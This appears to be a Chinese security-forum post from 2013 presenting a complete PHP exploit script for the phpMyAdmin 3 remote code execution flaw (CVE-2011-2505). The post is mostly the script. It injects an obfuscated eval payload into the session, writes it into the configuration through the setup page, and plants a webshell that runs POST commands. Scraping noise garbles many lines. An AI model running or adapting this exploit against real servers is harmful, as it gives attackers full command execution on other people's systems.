最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。 K5 a3 V! a7 @) z& I
. `) ]. j6 a$ V' t昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
/ k7 t) ?/ Y7 \; L. j' E- T5 ~3 K+ k1 E2 S+ l
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
: y1 p" m* @% I( H" g一是session.auto_start = 1;9 _, B8 h) R; ]
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
( C8 k( V, |% ?3 d- _当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。7 d& j6 v. j: n& S; B$ d
8 y# x. |2 F& Y Z9 N; u
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。& L* A4 t$ @" S; |
6 |& M; L. h4 J1 F; X于是写了这个php版本的exp,代码如下:
/ r: w2 w! }; p0 ~# j# F3 ^( s' ?; I7 f
#!/usr/bin/php# G V! M7 a9 H' t- a4 c! ]
<?php/ v! c- d% z9 N$ z' }5 K M9 R
print_r('
; H, n( p- @: G$ F+ c' F# t+---------------------------------------------------------------------------+% B: P# K8 o/ w# d
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
* [; }$ V3 W, ]6 D @. q" Q2 }by oldjun(www.oldjun.com)6 g- W' |7 p: L
welcome to www.t00ls.net! W' e* }1 ]# x
mail: [email protected]
) T0 J+ y( m4 N4 m6 AAssigned CVE id: CVE-2011-25053 B* j1 w a; w& f* r* e; U
+---------------------------------------------------------------------------+
2 ~- O$ r( |2 O& F* f! @');8 \0 r, p' P, w% h r
5 ~- V) u8 S: u; L/**1 [, E* p( W# e$ m
* working when the directory:"config" exists and is writeable.
- S. s& j$ [5 a* }**/
- p- X* ]4 {* A g# k
; I5 v& j& X1 k) b* l+ {) B9 ?if ($argc < 3) {1 r3 R& i% v0 h/ E- ?
print_r('& C, U6 N; H. M4 e0 F/ b+ [$ @
+---------------------------------------------------------------------------+7 V* Q" D! |, Q$ p
Usage: php '.$argv[0].' host path
4 E5 ^% t. `. Z4 a4 R" a) H: Uhost: target server (ip/hostname)7 T2 r3 C9 A" o1 Q; y9 s
path: path to pma3
+ i" X. | e) kExample:# T/ d. j1 _- I% u6 M
php '.$argv[0].' localhost /pma/
! ?# k1 N" |& b- D5 h& m; o+---------------------------------------------------------------------------+
4 r) @- M' c+ F/ m" T1 `');
$ W( ]; [( ]' a! _; Z exit;
3 P/ ~2 d, n9 f}( u2 Z/ E$ e% u# @
0 c- B: Q. H, a$ t$host = $argv[1];; t7 |2 `- C# ^9 T4 E- k
$path = $argv[2];0 ?% t* b% h* t# i
2 y- y1 Z9 C2 N* ^' {4 L6 s" z+ R/**
+ P/ N3 x3 M- G8 y! j! ?0 M * Try to determine if the directory:"config" exists9 |) Q! f0 T/ _# q: _; D
**/+ z* n2 N, H. Y: d) E
echo "[+] Try to determine if the directory:config exists....\n";
* G( }; e8 e: ~! Q* s/ r$returnstr=php_request('config/');! }# X6 I2 ~4 T j
if(strpos($returnstr,'404')){5 K) d& S+ j* u; P6 n/ M4 h
exit("[-] Exploit Failed! The directory:config do not exists!\n");) D2 E0 [5 D+ ?2 D
}: F. y7 D/ J2 i; R& T
1 N3 Q9 c/ _: {/**' D* J+ ?8 Y, |& w O6 {
* Try to get token and sessionid
3 ` Q2 l. J* s3 o4 I5 _0 y**/
. _2 T& _. ?& s; e- xecho "[+] Try to get token and sessionid....\n";
& i+ P) C; s0 `" [# L& }8 Y) c$result=php_request('index.php');- `# |( i+ B: r2 m+ C/ R
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
7 r3 P3 z0 D# u9 B- A$token=$resp[3];
; l8 I- o) e' w1 N5 [- t) {* R$sessionid=$resp[1];/ D! m# V O9 D& ~: l
if($token && $sessionid){5 R. [0 W& ?" i" H
echo "[+] token token\n";
9 W6 t% {6 I: `6 c _ h7 e echo "[+] Session IDsessionid\n";
: v4 p1 [( s8 P- {1 G. N}else{
6 n" M6 I* T) T# v3 P exit("[-] Can't get token and Session ID,Exploit Failed!\n");
) s) l9 J( B3 z}
' i% K& @: W# {7 P5 |# R# J
# s( F5 x. [. j" E6 } y7 G/**' |3 X/ a/ H% D; F3 `
* Try to insert shell into session/ [) x0 X- O+ u* c" g( I# M
**/
; T# E& u0 w/ }- h" `2 pecho "[+] Try to insert shell into session....\n";
( `6 Q+ h/ q3 Q; `. _* Sphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here., k5 t) Y. w( L5 ~) R
( Q% V/ s0 |2 }3 q; ]
/**: a; }- C3 |) P2 Q/ Z+ I
* Try to create webshell
$ @, V1 m' h* b" k( ?: P**/
( D; X! p( A1 F1 p& zecho "[+] Try to create webshell....\n";
& B2 e9 N W# t! N' Ephp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
3 W% H. q6 X& Z4 k0 G/**7 A0 k2 Z9 e: v$ \8 s. g3 l
* Try to check if the webshell was created successfully7 z7 f6 m- q! E
**/# C# L$ o: w! d2 V! _/ ~" r
echo "[+] Try to check if the webshell was created successfully....\n";% @8 B$ V( Z' r. F
$content=php_request('config/config.inc.php');. m* J. m0 \$ h, Y
if(strpos($content,'t00ls')){" ?" `# N6 |* ?3 A" M5 k
echo "[+] Congratulations! Expoilt successfully....\n";
' K4 u) t3 ^6 F, D' b' K echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";/ C3 A) Z: w1 h; x3 U3 s
}else{
3 E) T1 {5 @4 z, @: X2 M exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");; _& x& t q7 ]6 k3 t: A
}
: s( l+ u' S0 T, L9 a$ ^
1 G- q: U4 a+ x/ ~7 D ~3 nfunction php_request($url,$data='',$cookie=''){
/ | V# ]# q7 B5 M global $host, $path;
! w3 h2 e# c' u/ b; y: ]
( }7 [5 v& }: J $method=$data?'POST':'GET';# |# |/ H7 Z) k
* c% G9 U! b* t' B$ L# R, x3 s% | $packet = $method." ".$path.$url." HTTP/1.1\r\n";
0 W/ b( Z" X- ~- A/ {6 e* Z $packet .= "Accept: */*\r\n";
: y' h9 o# S- W; K $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";5 S0 \- G7 c% X) @
$packet .= "Host: $host\r\n";
9 H7 {$ d1 S1 i- k+ e \! a* } $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";, y! L" A4 v9 E: q4 i: Q" i% H
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";4 H& U* h# A: I+ G8 n
$packet .= $cookie?"Cookie: $cookie\r\n":"";
$ j1 K" f) y# Y+ f $packet .= "Connection: Close\r\n\r\n";4 { T6 b* B. ^
$packet .= $data?$data:"";
6 b) [8 U1 ^1 W9 P
: X6 n/ ~! O6 o' a( u+ N4 n $fp = fsockopen(gethostbyname($host), 80);5 n" g& Q* d# M, B0 Z5 n
if (!$fp) {
/ u5 @* u# V- Q* U% G+ c echo 'No response from '.$host; die;
8 ?( F0 E4 E+ c+ P }$ d1 p: Q: [* O. K& ?' b
fputs($fp, $packet);
, P5 a2 m c% O9 X
' u; }7 n0 k8 e5 Q" a+ G E $resp = '';
* [6 S7 y* g+ j# O! ]4 `, {$ r) y, v
) Z6 x: ?0 Y1 @2 ?/ y3 o/ h7 j while ($fp && !feof($fp))" w* Z7 O2 S5 [- p
$resp .= fread($fp, 1024);
- I0 K* |: g* H5 I. f+ Z8 k, I, S1 b2 q3 Z& M
return $resp;
( d' B W2 \" u}2 z; n, \% r0 z
, u! Y' V# J& T. A6 C% T$ S
?>
; N9 p: k A5 s, w" n. |
发表于 2013-2-21 09:13:03
收藏
分享
支持
反对